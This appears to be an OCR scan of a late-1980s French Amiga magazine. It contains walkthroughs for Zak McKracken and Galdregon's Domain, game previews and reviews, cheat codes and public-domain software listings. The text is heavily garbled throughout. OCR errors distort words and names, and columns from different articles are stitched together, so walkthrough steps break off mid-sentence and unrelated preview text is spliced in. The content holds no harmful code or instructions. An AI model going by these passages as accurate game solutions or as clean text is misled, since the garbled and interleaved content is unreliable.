Retourner dans la chambre et utiliser le COUTEAU A BEURRE avec la CASH- CARD qui est sous le bureau. Aller au canapé, et ramasser le coussin qui est par terre. Ramasser la TELECOMMANDE qui se trouve sous l’autre coussin et aller ramasser le fil électrique, et après l’avoir branché, utiliser la TELECOMMANDE.
Aller dans la cuisine, ouvrir le plaquard sous l'évier pour y prendre le CRAYON JAUNE. Utiliser le CRAYON JAUNE sur le PAPIER DECHIRE. Ouvrer le réfrigérateur et prener l'OEUF. Prendre la PETITE CLEF sur le mur, et sortir.En sortant, aller à gauche chez le boulanger, et sonner 3 fois de suite. Prendre le PAIN RASSIS et aller à la compagnie du téléphone pour payer la FACTURE DE TELEPHONE. Juste avant de sortir, prendre le BULLETIN qui se trouve dans la boite sur le mur. Aller chez le marchand dans la 14ème avenue (1ère porte). Vous achetez: la BOITE A OUTILS, le CLUB DE GOLF, la COMBINAISON.
Ouvrer la BOUE A OUTIL pour y découvrir la CLEF On commence noire petit tour d’horizon avec OCEAN. DRAGON NINJA sera normalement disponible au moment où vous lirez ces lignes, et il semblerait que l’adaptation du jeu d’arcade soit aussi bien réussie que OPERATION WOLF. Si c’est le cas, ça promet... (P 0C I9&!M‘EC £r SU'J . VOS ‘ECSJVAIJ Toujours dans le domaine de l’adaptation, celle de la série des INCORRUPTIBIJsS arrive. On va pouvoir se plonger dans les bas fond de Chicago où Solution ZAK (suUt) ANGLAISE, le RUBAN ADHESIF, la CORDE, les CISAILLES. Sortir et aller devant la boutique du
coiffeur, et utiliser les CISAILLES sur la PINCE A CHEVEUX. Revenir chez ZAC pour mettre en marche le répondeur téléphonique. Dans la cuisine, démonter le typhon de l'évier avec la CLEF ANGLAISE. Mettre le PAIN RASSIS dans l’évier et appuyer sur le boulon juste au dessus. Vous obtenez maintenant DES MIETTES DE PAIN que vous ramassez bien évidemeffl. Remettez le syphon, et utiliser le BOCAL A SUSHI dans l'évier. Sortir, et aller prendre le bus. Pour reveiller le conducteur, utiliser le KAZOO et n’oubliez pas d'inscrer votre CASHCARD dans le lecteur. Une fois à l’aréoport, acheter le LIVRE du
fervent avec votre CASHCARD, puis prendre l'avion.
- DANS L’AVION - Aller aux toilettes, et mettre le papier
hygiénique dans l’évier. Ouvrir le robinet, et quand Peau
déborde, utiliser la sonette d’alarme (au fond sur le mur).
Aller rapidement au lcr fauteuiL prendre le COUSSIN et le
BRIQUET qui vient de tomber. Aller rapidement à l’avant de
l'avion, et mettre l’OEUF dans le four à micro-onde. Allumer le
four, et retourner à son siège. Lorsque l’hôtesse est revenue à
Pavant de l’avion, ouvrir tous les coffres qui se trouvent au
dessus des fauteuils. Dans le dernier, vous trouverez un TANK A
OXYGENE. Le prendre, et abréger le vol.
- SEATTLE - Sortir de l'aréoport, et ramasser la BRANCHE D’ARBRE.
Donner les cacahuètes à l'écureuil, et creuser la terre avec la
BRANCHE D'ARBRE Entrer dans la grotte et prendre le NID
D’OISEAU abandonné (oui se trouve un peu au dessus et à
droite de ZAC) avec le COUTEAU A BEURRE Aller à la fosse à feu
(au milieu), et mettez-y la BRANCHE D’ARBRE et le NID D'OISEAU.
Allumer le tout avec le BRIQUET, Aller vers les marques
étranges, et utiliser le CRAYON JAUNE dessus. AÎler dans le
passage secret, et devant la statue, utiliser la TELECOMMANDE.
Prendre le CRISTAL BLEU, et aller â l'aéroport. Utiliser le
terminal pour prendre un billet pour MIAMI. Prendre l’avion.
Régnent la pègre et l'alcool. Si vous vous sentez une âme de redresseur de tort, ROBOCOP est fait pour vous. Assurer la protection des habitants de Détroit n’est pas une tâche façile, même pour un super flic. Avec DOUBLE DETENTE, c’est une véritable aventure policière qui vous attend. Le détective le plus dur de Moscou et le flic le plus fou de Chicago sont réunis pour traquer un leader de la pègre. A vous de faire cohabiter le Sovièt et le Ricain si vous voulez éviter les gangs et les divers pièges qui parsèment votre chemin.
- MIAMI - Dans l’aéroport, donner le LIVRE au clochard qui vous
donnera une BOUTEILLE DE WHISKY. Utiliser le terminal pour
revenir à SAN FRANCISCO.
- SAN FRANCISCO - Aller chez le marchand et vendez la
TELECOMMANDE et le COUTEAU A BEURRE. Sortir et aller mettre le
CRISTAL BLEU dans la boite au lettre (2ème porte). A ce moment
là, vous faites connaissance avec ANNIE qui est avec vous sur
terre, et MEL- LISA et LESL1E qui se trouvent sur MARS
(rappelez-vous à la télévision...). ANNIE vous donne un
FRAGMENT DE CRISTAL.
ANNIE trouve sa CASHCARD sous le prend l'avion pour LONDRES, puis KATMANDOU.
- KATMANDOU - Aller à droite, et donner le livre au GARDE.
Entrer, et aller voir le GOUROU qui vous expliquera comment se
servir du CRISTAL BLEU. Sortir et aller à droite pour mettre le
feu à la paille. Aller à la prison, et Cdre le drapeau.
Retourner au Yac, et uti- votre CASHCARD sur le Va: pour
retourner à l'aéroport Utiliser le terminal pour aller
KINSHASA.
- KINSHASA - Aller dans la jungle, prendre n'importe quel
passage, et dans le village, aller dans la : hutte. Donner le
CtUB DE GOLF au SIIAMAN qui va vous faire voir une danse
intituléc:"La danse qui déverrouille la porte de ta tête", bien
Regarder cette danse, et surtout noter dans quel ordre les 3
danseurs s’acroupisscni à la fin de la danse (après avoir
allumé le feu), n est TRES IMPORTANT de noter Tordre, car il
diffère à CHAQUE partie que 1 ’on fait Sur ces bonnes paroles,
je vais vous laisser jouer un peu, et je vous dit à dans un
mois pour la deuxième partie de cette méga- aventure.
Thierry R. D'après la preview, le jeu sera sans nul doute un must! (disponible fin Avril). Enfin pour les joystickcurs fous, RUN THE GAUNT- 1JET devrait lui aussi ôtre disponible. Vous allez devoir piloter: un hovercraft, un speedboat, un jetskis, un buggy, un quad cl bien d’autres véhicules encore. Et ce n'est pas tout, vous devrez aussi prouver votre force par un véritable parcours du combattant, avec loul ce que cela doit comporter (troncs d'abres glissants, canon à eau, grimper au filet..). Je n'ai jamais vu autant d’épreuves différentes en un seul jeu!
Test le mois prochain.
On change maintenant d'éditeur, et on passe chez INCENTIVE qui nous délivre TOTAL ECUPSE. Egypte 1930. A la suilc d'une éclipse, vous découvrez une salle perdue au coeur d'une pyramide. A vous de découvrir le mystère qu'elle garde jalousement et essayez d'en ressortir.,..vivant! La version R bits est déjà excellente, et la version Amiga promet d'être grandiose: graphismes en 3D solide et le tout, en freescape! On passe maintenant à HEW- SON qui termine CIBERNOID 2. Les graphismes sont de Huch Binns, et il y aura de nouveaux monstres cl d'autres armes (Sortie fin Avril).
Toujours de chez Hcwson. ASTAROTH nous mène au fin fond d'une caverne. Vous incarnez un brigand (pour une fois) et vous devez découvrir les trésors de cette caverne.
Ambiance lugubre assurée (sortie Mai). On continue notre tournée, et on passe à US GOLD. Le premier des Data-disks pour OUTRUN arrive, et ce sera L’EUROPE. On pourra traverser cette fois, Paris, Londres, et essayer les fameuses autoroutes de R.F.A. J’espère que les graphismes et surtou! L’animation seront plus soignés que pour la Californie, car après avoir vu Crazy Cars II.
ça va être dur. Mais attendons la fin Avril pour voir ça... VIGILANTE quant à lui, est la conversion du jeu d'arcade d'IREM. Vous allez devoir vous bastonner contre une tribu, que dis-je, une horde de skinheads qui ont enlevé votre petite amie. Les skins veulent gouverner la ville, et ils ne vous rendront voire copine qu’en échange, de voire territoire.
Tous les coups sont permis, et n'hésitez pas à vous servir de nun-chakus et autre churikcns pour arriver à vos fins. Un jeu calme et pacifique en perspective.
Du côté de chez IMAGINE, pas grand chose de prévue sauf RENEGADEIII CH A ¦ PITRE FINAL (ça me fait penser aux interminables Vendredi 13 qui n’en finissent plus d'être le dernier...). Je dois bien avouer que les 2 premiers ne m'ayant pas laissé un souvenir impérissable, je resterai dubitatif jusqu'à cet été (date de sortie) pour vous en parler. On poursuit paisiblement avec GREML1N qui nous prépare 2 jeux: le premier est BUTCHF.R HII.L. Reprenant comme toile de fond, la guerre du Viêt- Nam. Vous allez devoir dans un premier temps, remonter une rivière en Zodiac, puis traverser la jungle en
évitant 100000 pièges pour arriver finalement, à la montagne du boucher. A mon avis, ça va canarder sec. Le deuxième en date sera H.A.T.Ë (llostille AU Terrain Encountcr). C'est un shoot ’em up à scrolling horizontal avec une trentaine de tableaux. Sortie prévue fin avril. RAIN- BOW ARTS (complôtcmcnts déchainés en ce moment puisqu'ils vietmenl déjà de sortir DENARIS et RF.ALM OF THE TROLLS) vous mets cette fois, dans la peau d'un cascadeur avec DANGER FRF.AK. Le principe du jeu est génial: vous êtes un cascadeur engagé pour doubler des vedettes de cinéma lors du tournage. Vous travaillez
sur 3 films différents, et pour chaque film, vous devez exécuter plusieurs cascades plus ou moins dures. Chaque cascade est filmée, et si vous réussissez, vous pourrez voir le film en entier. Sortie fin Avril. On continu avec les bons scénarios et OUTLAW-PALACE SOFTWARE, dont voici venir leur dernière production: COS- MIC PIRATES. Evadé de prison à l'aide d'un tube de dentifrice et d’un ouvre boites (???), vous êtes obligé de rallier le Council (mafia de l'espace). Mais il faut faire scs preuves, et pour subsister, vous devez attaquer des vaisseaux, et voler leurs armes et cargaisons. Mais
le Council se paye sur votre butin (90 à 98 %) et il n'est pas évident de faire quelques économies. Un super jeu de stratégie et un peu simulateur de vol qui sera disponible très prochainement.
ELECTRONIC ARTS nous annonce enfin la sortie de POWERDROME, la fantastique course en 3D surfaces pleines. Le jeu a été complètement reprogrammé pour l’Amiga, et ceux qui possèdent 1 MO profileront pleinement des effets sonores du jeu. A noter que l’on pourra jouer à 2 en même temps, via la sortie série de l'Amiga. A noter aussi que pour POPULOUS, la musique sera de RGB HUBBARD l'homme au 60 musiques de jeu dont la plus connue est certainement Monty on the run.
ROB est certainement le plus grand musicien sur micro, et cette fois-çi, il partait qu’il a fait fort le bougre: la musique de Populous sera basée sur les chants Grégoriens pour l'intro, et après, ça sera du grand HUBBARD pendant prés de 30 MINUTES sans répétitions. Normal, Only Amiga Makcs it possible!
Si il est des sociétés qui se contentent de Populous • Electronic Arts ce quelles ont, cc n’est pas le cas de TITUS!
Déjà, un accord a été passé avec ANCO et EMPIRE.
Le premier soft d'ANCO qui sera distribué par TITUS, est KICK OFF. C’est fine simulation de football vu de dessus, et je peux vous dire, que ça n'a rien à voir avec les cacaboudins de SOCCER que l’on a eu jusqu’à maintenant. Rapide, fluide et surtout nés jouable, KICK OFF renouvêllc complètement le style d'Anco. Je vous en parlerais plus en détail le mois prochain.
Le 2ème jeu nous vient donc de EMPIRE. Vous ne connaissez peut être pas cette société, mais sûrement leurs productions: TRIVIAL PURSUIT ci THE HUNT FOR RED OCTOBER sont certainement les deux plus connus. SLEEPING GODS IJF. Qui est un méga jeu d’aventure graphique, et qui va sûrement faire date dans l'histoire de la micro: tout le jeu est en 3D surfaces pleines (comme Starglidcr II par exemple) et en plus, c'est là que réside le truc, des sprites et des décors en 2D y sont mélangés! Pour vous donner une idée de la chose, imaginez que votre personnage sc trouve dans une pièce, avec au centre,
une table et des chaises. Vous avancez vers la table, ça zoom hyper rapide et sans saccade (normal, c'est de la 3d), et au fur et à mesure que vous vous approchez, vous distinguez des assiettes, des verres, des plats... Tous ces ustensiles sont en fait des sprites que l'on a "posés" sur une table faite en 3D. De même, on peut voir des portraits au mur, des torches qui brûlent, et rccontrcr des ennemis aussi beaux et aussi bien animés que dans un bon jeu d'arcade, qui vous tirent dessus! Du point de vu programmation, Dungeon Mas- ter à côté, est réduit à l'état de programme basic sous
interpréteur. Normalement le jeu devrais sortir courant Mai, cl, comme tous les jeux que TITUS distribuera, ce sera en Français (doc et jeu).
Thierry K. SUPER HANG ON Encore une course automobile, direz-vous? Mais alors quelle course!
Celle fois-ci vous pilotez une moto de compétition équipée d’un "rnrbo".
Choisissez voire mode de contrôle souris ou manette, la sensibilité, la musique et enfin le niveau de difficulté. Mesurez vous aux meilleurs sur 4 continents: Afrique, Asie, Amérique et Europe: dépaysement garanti. Une fois votre choix effectué, placez vous sur la grille de départ, compte à rebours et ... GO! Dés les premiers instants on est frappé par la qualité du jeu: animation rapide et très précise, son très correct et graphismes jolis sans êtres exceptionnels dans les pastels. Chaque continent comporte un nombre donné d'étapes à boucler dans le temps imparti. Ce jeu est très
technique, il faut un bon entrainement à tous les parcours pour savoir où et quand activer le rnrbo qui vous propulsera à plus de 350 Kmh, et ou ne pas y toucher sous peine d’envol prématuré dans les virages.
Malgré son thème des plus classiques, ce jeu reste très prenant: on a sans cesse envie d’aller plus loin, et on n’est pas découragé car la difficulté est très bien dosée. Et puis les bonnes doses font les bons cocktails et les bons jeux!
Donc en conclusion: une réussite, bonne conversion d'arcade qui ne décourage pas de sitôt, un bon investissement quoi!
Workbinch in Official AD&D Monstcr Manual 1.
Les courses de voilures on! Loujours été sur micro, un sujet très convoité!
Cependant, très peu sont à la hauteur de l'Amiga, et seuls, Test drive (qui est plus une simulation) et 944 Turbo Cup m'ont vraiment plus. Mais le jour bénis, ou le sympathique fonctionnaire des P.T.T déposa délicatement d’une main fébrile un paquet portant la mention "Abus dangereux" au fond de ma boite aux lettres, je su que j'allais devoir passer quelques nuits blanches: CRAZY CARS II était enfin arrivé !
Dès la présentation, le ton est donné: graphisme haut en couleur et musique d'enfer. Un p'tit coup d'oeil sur la doc, et je m en vais vous conicr le .scénario: Le gang des casseurs sévit à travers [es States. Ils volent cl pillent tout ce qui ressemble à une Lamborghini, Porsche, Mercedes, et surtout, Ferrari. Vous avez donc pour mission, de démanteler ce réseau et pour ça.
Vous ave , la toute dernière Ferrari: la F40.
Moteur V8 à 90" double turbo 1HI avec échangeur air air de 2.9 litres . 478 ch Din à 7000 tr min, 324 km h, 1000 métrés départ arrêté en 20.7 secondes bref, le pied!
1 A-News Vous allez donc devoir participer à une course qui conçistc à ralicr 2 villes dans 4 états différents (Ulha, Colorado, Arizona et New Mexique) en un minimum de temps.
En fait, pour gagner la course, vous devez loujours rouler pied au plancher (do toute façon, c’est comme ça que l'on conduit une Ferrari, non?). Mais tout ne serait pas si simple si il n'y avait pas les étemels trou- bieurs de fctc: la police. Vous allez donc devoir éviter la flicaillc qui veut vous arrêter pour excès de vitesse, et les faux flics (le gang des casseurs) qui roulent dans des voitures de police et qui n'ont qu'un désire, celui de vous faire mordre la poussière. Pour vous aidez, un ordinateur de bord couplé d'un radar, vous indique les voitures de polices (devant ou derrière
ainsi que leur éloignement par rapport à vous) et les barrages routiers. Vous disposez aussi et surtout d'une carte routière avec les différents numéros de routes. Quand vous arrivez à un croisement, l'ordinateur vous indiquera le N* de ou des routes que vous allez croiser.
A vous de prendre les racourcis qui s'imposent.
Le pilotage de la voiture, reste cependant le plus dur à apprendre: au début, la F40 ressemble plus à une savonette qu’à une voiture! Essayer de jouer au joystick s'avère pour ma part, un l'explois, et je vous conseille la souris qui est quand même plus précise. Mais une fois que l'on s'est accoutumé à ce pilotage un peu bizaroïde, on s’apperçois qu’en fait, c'est pas un mauvais choix de la part de Titus. Côté animation, alors là. C'est grandiose: ça va très très vite. Aucune saccade dans le défilement de la route, les côtes et descentes sont bien gérées. Mais le plus remarquable, c’est
certainement le défilement des poteaux éléctriques sur le côté de la route. Cela restera sans nul doute dans les annalsü Pour ce qui est de la voiture, les proportions sont bien réspeclées, et l’animation de la voiture lors (i 'un tête à queue me laisse encore rêveur.... Sinon les décors sont nettement plus travaillés et plus ' diversifiés que dans le I, cl de plus, la nuit tombe progressivement, ce qui n'existe pas sur ST (héhé).
En définitif, pour réussir un excédent soft, il faut: un scénario qui tienne la route, de beau graphismes, une bonne animation, de bon bruitages, et surtout, je l'originalité.
Et bien,puisque CRAZY CARS II possède de façon indéniable, tout ces éléments, c'est que c'est possible, non? Et pour conclure, je ne dirais qu'une chose: CONTACT!, SSSSCCCCRRRRRRiiiiiiiüiiij (crissement des pneus Pirclli P Zéro 335 35 ZR 17 sur l’asphalte sttrchaufé par un soleil de plomb) CrazyThierry R (dit le speed)
P. S: Coup de chapeau à GRABUGE (le dessinateur des jacquclts
Titus) qui n'en finit pas de s'améliorer, et qui réalise içi,
son plus beau dessin.
¦ iFira Rebel Charge al Chickamauga CRAZY CARS II Plus speed que ça, tu meurs... SSI, passé maître dans les wargames, persiste et signe une fois de plus, un excellent produit: l'action se situe cette fois en pleine guerre de sécession et plus précisément, le 19 Mars 1863. Vous allez revivre cette grande guerre civile qui changea la face du monde, et qui, pour abolir l'esclavage, opposa les Confédérés à l'Union en faisant quand même, plus de
600. 000 morts!
La traduction faite par UBIsoft est excellente du point de vue linguistique.... Par contre pour ce qui est de la mise en page, ouarf ! De plus la pagination originale sur laquelle la protection du programme s'appuie n’a absolument pas été respectée. Le tuyaux d'A-féews: la page 11 du manuel anglais (là ou se trouve les réponses aux questions demandées par le programme) est en fait la page 36 de la version française. Néanmoins, elle comprend un historique complet et décrit parfaitement les règles. La présentation du jeu est classique, sobre, trop sobre même.... mais son avantage est d'être
claire.
En ce qui concerne le son et le grapltismc. C'est là que les choses se gâtent. Côté son ça va encore: divertissant sans plus. Coté style graphique on voit une certaine ressemblance avec Roadwar 2000. Les défauts: les couleurs sont un peu crues et utilisées maladroitement. Mais alors le scrolling BEUUUAARRKKKK !!!!!!
11 est désagréable, scintillant, sacccadé... La manipulation est grandement facilitée par les exemples fournis dans la doc. Large utilisation de la souris et grande possibilité offerte par le clavier.
Il n'y a pas de problème d’utilisation du jeu (on ne reste pas bêtement bloqué quelque part). Enfin l'ordinateur a une grande rapidité d'action. Et ce qui ne gâte rien c'est qu'il se débrouille assez bien en stratégie le bougre!!!
Le réalisme est très soigné. Un très grand nombre de facteurs sont pris en compte dans le système de jeu d'où réalisme accru (moral des chefs, pertes détaillées, fatigue des troupes...). Un point très positif dans ce wargame, le commandement a une très grande importance (ce qui est essentiel), n y a une bonne vision des objectifs recherchés, la description des armées est complète et enfin la qualité historique des armes et de leur efficacité est respectée.
En résumé: Du point de vue wargame c’est un HIT, il est excellent !!!
Mais côté réalisation, des défauts graphiques gênants qui auraient pu être facilement évités (Amiga oblige). Dommage car c'est vraiment un très bon jeu.
Quand fera t-on des wargames soignés en micro-application et en finition ?..... Fireball & Hervé FISH - LA SOLUTIO DRAGON’S LAIR : CHEAT CODE Pour tous ceux et celles qui n'arrivent pas à avancer dans ce magnifique jeu, voici en exclusivité et rien que pour vos yeux, le code qui permettent de voir tous les tableaux en mode démo. Appuyer simultanément sur: ESC R = L N 7 (clavier Azerty) Rentrer ce code à n’importe quel montent du jeu, et sous vos yeux ébahis, Dirk continuera seul à défier tous les pièges.
Arkanoid II - sur l’écran "high score" entrer le nom DEBBIE S pour avoir des vies infinies.
Faery Taie - parler avec le roi dans le chatcau de crystal sur F islc. Appuyer sur le bouton droit du souris et votre "luck" augmentera jusqu’à 65.
Defender of the Crown - appuyer sur K pendant chargement jusqu’au début du jeu pour avoir 1024 chevaliers.
Hybris - Bootez (démarrez) le jeu, puis emrez COMMANDER et cliquez le boulon feu. Quand ic jeu commence, attendez quelques instants, puis appuyez sur F10.
"Pais explorer le vasle monde de Mczron cl rclrouvc les cinq gemmes de Zator avant le démon Azazaèl." Telles sonl les paroles de voire bon roi qui marquent le début d’une longue quête à travers donjons, forêts, plaines et grottes. Les rencontres que vous ferez seront nombreuses, mais prenez toujours le temps d'écouter un bûcheron ou un elfe, leurs conseils sont précieux. Allez voir le maître d’armes Viking. Il vous offrira une splendide épée magique.
Recherchez ensuite le grand mage et son livre de sorts, très précieux lui aussi, et enfin rencontrez le moine qui vous livrera le bracclcl de téléportation. A présent vous voilà prêt pour affronter mille périls; enfin presque, car j’ai omis un petit détail: vous êtes nu et ne possédez qu'un petit sac ci une dague. Il vous faudra donc combattre pour vous équiper, écu. Armure, autant d'attributs qui vous faciliterons la vie. Mais avant de commencer le carnage, trainez donc dans les auberges. Des clercs vous vendront soins et potions pour un peu d'or.
Vous regagnerez aussi un peu de vitalité en achetant de la bière locale.
Après ce bref aperçu du scénario, parlons un peu du soft lui même. Les graphismes sonl très contrastés, ils alternent simplicité dans les paysages et réalisme extrême chez les personnages et les décors intérieurs. Le son qui est très présent dans le jeu esl bon. Sans être excellent, un peu répétitif en fait. L'animation : le système de vision ressemble assez à celui de Dungeon Masler avec des transitions plus fluides. Le jeu est à base d'icônes dans le tiers inférieur de l'écran, les paroles et divers messages apparaissent avec un scrolling très smoolh. La gestion est donc très agréable
quoiqu’un peu limitée.
Les amateurs d'héroïc fantasy cl de Advanced D&D seront comblés par ce jeu d’avenlure qui sait faire revivre l'ambiance ’jeu de rôle', les amateurs d'aventure tout court seront aussi satisfaits. Le jeu donne pas mal de fil à retordre.
Quelques aides et astuces dans le prochain numéro; si vous avez la solulion faites 3615 DEEP BAL WORKBINCH GALDREGON’S DOMAIN Tum over, in, look, enter small warp, ask rod to make coffce, gel cassette in bin, w, w, open doors, tum switch, s, gel cassettes in bin, n, n, open cupboard, gct clcancr, set fader lo 7, play clcancr with player, play cassettes witli playerfune combinaison de 3 chiffres est donnée), s, c, c. open door, n, set lock on xxx(combinaison),opcn cabinet, gel spindle. Enter smooth warp, s, s, c, e, c, open cage, w, w, w, n, n, wait, wait, examine stuntp, get dise, c, c, s,
s, e, open cupboard, gct ail in cupboard, get glovcs, put gloves on. Put dise in cruciblc. Hold cruciblc over fire with longs, get mould, w, w, nw, ne, e, put gold in mould, attendre que l’or refroidisse, break mould with hammer, gel ring. Enler jagged warp, gel ail, put jeans on,
s. search rubbish. Gct torch, light torch, c, c, e, e, n. d, s,
push débris, push lid, d, gct cord.
U, n, u, s, s, put blanket on pcw, get pcw, tum off torch, n, n, tum on torch, drop pcw, sit on pcw, u, tic cord to gargoyle. D. pull rope, gel gargoylc, unlic cord, d, s, put lid in doorway, d, put gargoylc in holc, examine chalicc, gel il, gct gronmteL Enter large warp, examine on shelf, gct fishofax, look under fishton. Get pass. Put hand on print, tum off switch, s, d, s, e, d, prendre metro pour Pickcrcl, u, sc, n, buy tic and glasscs with Eisa. S, se, e. e, buy screw- driver and hyperdriver and bag with fisa, w,
s. buy plugs with fisa, n. w, nw, nw, d, metro pour OPAH, u, e.
e, s.dès que l'on voit Ber tic Brcam faire ask Brcam aboul
disco (il vous donne rendez vous pour aller au disco), e, s,
open book at pafce 321, lear page, e, put cards in slot, c,
sc, put page ïn slot, tum switch off, drop bag and
hyperdriver, nw, pui cards in slot, w, w, w, w, s. buy food
widi fisa, buy sachet with fisa, n. Attendre le rendez-vous de
Bertie à l’heure qu'il vous a fixée, dès qu'il arrive faire n.
givc tic to Bcnie, n. w, d. metro pour MUSEUM, u, n, n, open
sachet, n, get crystal, s, s, s, d, metro pour Pickcrcl, u,
sc, s, buy mask with fisa card. Give mask to drunk, ask drunk
about card, buy mask with fisa, give mask to drunk, buy mask
with fisa, buy cylinder with fisa, n, e, e, n, buy fishton
with fisa, s, w, nw, nw, d, metro pour Paddlington, u, w. n,
u, get case, n, drop case and sachet, il vous faut entrer dans
le Dark Warp pour récupérer le cylinder, pour éviter de
tourner en rond dans les dimensions prenez la première
direction, puis la deuxième, puis la troisième, etc... et
recommencez à la première lorsque il n'y a pas assez de
sorties.
Dès que vous trouvez le cylinder. Get cylinder, u, get cylinder, u, get case, s, d, s, c, d, metro pour OPAH, u, c, c, put new card in slot. N, put crystal in tuna. Close tuna. Tum on tuna, open it, gct crystal, put cards in slot, s, e, c, put cards in slot, c, sc, drop crystal and case, get bag. Nw, put cards in slot, w, w, w, put cards in slot, n, u, put cylinder in bag. Open cylinder, drop bag, gct bridge, climb railings, w, d, metro pout Battcrsca, u, n, tum switch off, w, w, Removc scrcw with screwdriver, e, e, s, d, metro pour OPAH, u, e, c, e, c, put cards in slot, c, sc, break glass
box with screwdriver, get focus wheel and case and crystal, fix whccl to filtcr, llx crystal lo bridge, fix focus filtcr to crystal bridge, put crystal filtcr in case, nw, ne, drop regulator, remove screw with hyperdriver, à ce moment Bertie vous prévient qu'il y a une bombe et qu’il faut jouer à un jeu sur le terminal, sw, sit down, login, Bertie, grommet, games, shutdown.
A vous de trouver l'astuce nécessaire pour finir le jeu.
Une fois que l'on gagne au jeu, ne, remove screw with hyperdriver, get accelerator, get regulator, put il in device, fix regulator with lokscrcw ... OUF!!' Vous avez sauvé Hydropolis de l'évaporation. 11 manque 28 PTS cepcndanl pour avoir le maximum au score, alors il y a encore une ou deux chose à faire pour avoir 501 sur 501 PTS.
Gilles V. - William B. - Gilles G. O tempora, O mores, comme dirait mon épicier, grand amateur de citations Grecques.
Quoi c'est pas Grec c'est Latin! Eh vous, vous seriez faire la différence entre une pomme de terre Bintche, Roscval ou Belle de Fontenay? Non! Bon alors on la boucle quand je tente d'introduire dans ce journal un brin de culture pour contrebalancer les excès de langage frôlant la gaudriole de mon camarade Batchman.
Tout ça pour vous présenter les nouveaux Domaines Publics que vous trouverez ce mois ci sur 36 15 DEEP.
LES T’ES LAID- CHARGEABLES Dmouse : ça c’est de l'utilitaire.
Dmouse cusiomisc la gestion des fenêtres, écrans, souris cl tout ce genre de choses. La souris va se déplacer beaucoup plus vite (mais toujours parfaitement utilisable), il ne vous faudra pas plus de temps pour déplacer, ouvrir ou fermer écrans et fenêtres qu'il n’en faut à Bioman pour revêtir sa combinaison proto neutrinonée à mpteur de phase multiglitchable. Vous pourrez ouvrir immédiatement des nouveaux CLIs, faire passer les fenêtres devant, derrière. Et encore je vous dis même pas tout, c'cst dire!
(Ed: je vous conseille tout-de-méme de configurer le nombre de cliques pour la fonction "passer fenêtre devant" à au moins deux, pour éviter d'éventuels conflits avec les icônes du Workbench Pour les détails voir le doc qui est malheureusement en anglais. En bref, il faut mettre la ligne Dmouse -c2 dans votre slartup-sequence.)
Flipper : Le public y va pouvoir jouer et il est content. Flipper n’est ni un flipper ni un dauphin, c'est un Othello. Vous pouvez jouer à deux, contre l'ordinateur, il y a plein de niveaux de jeu et c’est moins violent que international karaté.
Lens : Encore un petit utilitaire qu’il est bon. Vous verrez dans une petite fenêtre le zoom de la zone où se situe le pointeur de la souris. Très utile si vous voulez créer un dessin point par point, ou si vous utilisez un programme de dessin sans zoom (tout le monde n'a pas Deluxe Paint).
Surveyor : Aucun rapport avec Musclor ou Tenninator. C'est le complémentaire du programme précédenL Une petite fenêtre vous affiche en permanence les coordonnées de la souris ainsi que la couleur de l’écran se trouvant sous le pointeur.
Player : Le player de musique digitalisée qui tue. Vous faites start debudsoiree longueur duftehier 300 et youkaïdi ça joue votre morceau de musique digitalisée.
Vous faites stopsound et la musique s'arrête.
300 c'cst un exemple pour jouer à vitesse normale, vous pourrez aussi jouer à l'accéléré, au ralenti.
Debudsoiree c'est aussi un exemple (très mauvais certes; depuis que ces deux empâtés nous massacrent les cages à miel, je n’apprécie plus que les fins de soirée. Le jour où Adèle Scott rentre au TopSO j'arrête d'écrire dans A -News'.), vous pouvez évidemment lui faire jouer n'importe quoi (du Vanessa Paradis par exemple).
DAD : Le casse tête qui va bien. Il faut déplacer des carrés et des rectangles de différentes tailles, que même que si vous avez fait des études, c'est pas couru d’avance.
Tyee : Programme écolo qui vous dessine un arbre joli tout plein en récursif. A avoir pour comprendre la programmation récursivc.
StarTrekTrlvia : Un questionnaire (en anglais) rien que sur Star Trck : l'âge du capitaine Spock, la date de dernière vidange de l'Entreprise, y a-t-il des bulles sur Bunga.
J’en passe et des meilleures.
AMOE1ÎA : Le bon vieux space invader des familles avec les plots de protection et les envahisseurs avec des couleurs que même David Vincent il les a pas vues. Un must de la préhistoire du jeu Vidéb et en domaine public en plus; pourquoi se priver vous demandais-je?
FivelnLine : Eh oui, un morpion, le jeu qui s'accroche. Il y a les sources, et c'cst bien cool.
IFF2PCS : Ca vous prend une image IFF et ça la découpe en morceaux pour en faire un puzzle. Il y a plusieurs niveaux de difficultés, c'est à dire que l'image peut être découpée en gros carrés ou en tout petits carrés bien chiant pour les nerfs. L’image est réduite en haute résolution. Il y a les sources (intéressantes puisque vous pouvez faire tourner les camés du puzzle pour les remettre dans le bon sens et ça c’est fait par programme dont vous avez les sources (intéressantes puisque vous pouvez faire... mais il me semble que je vous l’ai déjà dit.
Le mois prochain encore rien que du bon, et sûrement encore Plus de DP. Yopla.
Avec Chorizo Kid, Eduquons, Eduquons.
A-NEWS organisera bientôt un service domaine public suite au départ de Giorgio Cupertino.
LES DERNIERS DELIRES DE F RED FIS H Voici le sommaire de ses dernières disquettes: 190 Garylcon; Collection d’icônes utiles et intéressants ILBMâltnage: Encore un Brush-to-C, pour une image au format IFF NetHack: Deuxième partie 191 BlitLab: Programme d’explications et de d'cxpcricnces sur le Blittcr Blk: Constructeur de requesters FilcBootBIock: Crée un fichier avec les blocs 0 et 1 (boot blocks) Ispell: "Spclling checkcr" Pzl 5: Puzzle 4X4 à 15 éléments 192 Eval: Evaluation d’expressions par "pattem matching" PacMariS7: Version avant-gardiste du Pac- Man ReSourceDemo: Demo de ReSource.
Dés- assembleur interactif 193 KcyMapEd: Editeur de clavier Zc: Compilateur C 194 Moria: Simulation de donjon à un joueur 195 MicroEMACS Version3.10: Editeur très performant 196 HamPics: Etonantes images en HAM avec le programme d'affichage 197 Ctags: Programme qui crée des "tags" dans différents types de fichiers Find: Recherche récursivc d’un fichier dans un répertoire Fixltunk: Programme qui force les DATA et le BSS à se loger en CI IIP memory Nro: Formateur de textes Stcvic: version Amiga de fcditcur UNIX ’vi' 198 Charon: Demo 199 Asimplex: Implémentation de l'algorithme du Simplex de
résolution de problèmes linéaires Csb Versioo3.02: Interpréteur de commandes inspiré du Csh d'UNIX MIDISoft: Transfère des samples entre l’Amiga et un Roland S-220 Pyro: Simulateur de feux d'artifices SnipDemo: Démo d'un programme de traitement du signal (Digital Dynamics) Vicwcr: Affiche des images IFF tous formats - hypcropdmisé 200 NotBoingAgain: Animation en HAM.
